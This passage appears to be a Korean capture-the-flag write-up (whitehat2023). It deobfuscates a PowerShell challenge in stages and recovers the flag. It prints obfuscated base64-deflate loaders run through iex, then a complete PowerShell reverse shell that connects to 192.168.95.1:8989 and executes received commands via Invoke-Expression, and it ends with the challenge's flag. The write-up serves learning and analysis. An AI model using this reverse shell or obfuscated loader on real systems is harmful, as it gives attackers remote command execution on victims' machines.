'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' ) , [SYstEm.iO.CompResSIon.CoMPRESsionmodE]::deCompRess ) | ForEACh{NEw-ObJeCt iO.StReaMREADer($_ ,[sysTEm.tExT.eNcoDINg]::Ascii) } ).ReADtoEnD( )다시 iex로 명령어를 실행하는 코드입니다.
$cmd = ( NEw-ObJeCt IO.CoMPrEsSION.DEFlaTEStREam([io.mEMOrYstReaM] [SyStEm.cOnveRT]::FRomBasE64stRING( '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' ) , [SYstEm.iO.CompResSIon.CoMPRESsionmodE]::deCompRess ) | ForEACh{NEw-ObJeCt iO.StReaMREADer($_ ,[sysTEm.tExT.eNcoDINg]::Ascii) } ).ReADtoEnD( )
$cmd'...' | fOReAcH-objecT {$pWvKG=$_ -CSPLIt ' ' | fOReAcH-objecT{' ';$_ -CSPLIt ' '|fOReAcH-objecT{ $_.lEngTh - 1 }} ; . ( ([STrINg]''.lAStindeXOfaNY)[117,45,80]-JOIN'') (-JOin ([cHaR[]][inT[]]( -JOin($pWvKG[0..($pWvKG.lEngTh-1)] ) ).TRIMSTArt(' ' ).splIt(' ' )) )}굉장히 긴 문자열을 파이프로 전달하여 뒤의 코드를 실행합니다.
마지막 명령어에서 ( ([STrINg]''.lAStindeXOfaNY)[117,45,80]-JOIN'')은 역시 'iex'로, 인자로 전달된 문자열을 명령어로 실행합니다. iex를 빼고 실행하면 문자열이 실행되는 대신 화면에 출력됩니다.
# solve.ps1
'...' | fOReAcH-objecT {$pWvKG=$_ -CSPLIt ' ' | fOReAcH-objecT{' ';$_ -CSPLIt ' '|fOReAcH-objecT{ $_.lEngTh - 1 }} ; (-JOin ([cHaR[]][inT[]]( -JOin($pWvKG[0..($pWvKG.lEngTh-1)] ) ).TRIMSTArt(' ' ).splIt(' ' )) )}powershell -executionPolicy Bypass ./solve.ps1function sh
{
Param
(
[Parameter(mandatory=$true, Position=0)]
[string] $ip_addr,
[Parameter(mandatory=$true, Position=1)]
[int] $port
)
$socket = New-Object System.Net.Sockets.TcpClient($ip_addr, $port)
$stream = $socket.GetStream()
$writer = New-Object System.IO.StreamWriter($stream)
$buffer = New-Object System.Byte[] 1024
$encoding = New-Object System.Text.ASCIIEncoding
$writer.AutoFlush = $true
while($true)
{
while($stream.DataAvailable)
{
$read = $stream.Read($buffer, 0, 1024)
$remote_command = ($encoding.GetString($buffer, 0, $read))
if ($remote_command)
{
try
{
if ($remote_command.startswith("show flag"))
{
$return = ( -joiN ( ( 62,33, 32,61 ,44,33,40 , 61,123 , 121 ,123 ,122, 50 , 120,44 , 123 , 40 , 125, 120, 40 ,40 ,127 , 44 ,47 ,43, 113 ,43, 125,122 ,47 , 121,120, 126, 121 ,47, 44,120 , 45 , 113,43 ,112 ,127 , 42, 121 ,113 , 52)| forEaCH {[ChaR]($_ -bXor'0x49' ) }))
}
else
{
$return = Invoke-Expression -Command $remote_command
}
}
catch [Exception]
{
Write-Output $_
$return = "Invalid Command"
}
}
foreach($item in $return)
{
$writer.WriteLine($item)
}
}
}
if($writer){$writer.Close()}
if($stream){$stream.Close()}
};sh "192.168.95.1" 8989show flag 아래에 있는 $return이 플래그입니다.
# solve.ps1
$flag = ( -joiN ( ( 62,33, 32,61 ,44,33,40 , 61,123 , 121 ,123 ,122, 50 , 120,44 , 123 , 40 , 125, 120, 40 ,40 ,127 , 44 ,47 ,43, 113 ,43, 125,122 ,47 , 121,120, 126, 121 ,47, 44,120 , 45 , 113,43 ,112 ,127 , 42, 121 ,113 , 52)| forEaCH {[ChaR]($_ -bXor'0x49' ) }))
$flagwhitehat2023{1e2a41aa6efb8b43f0170fe1d8b96c08}728x90
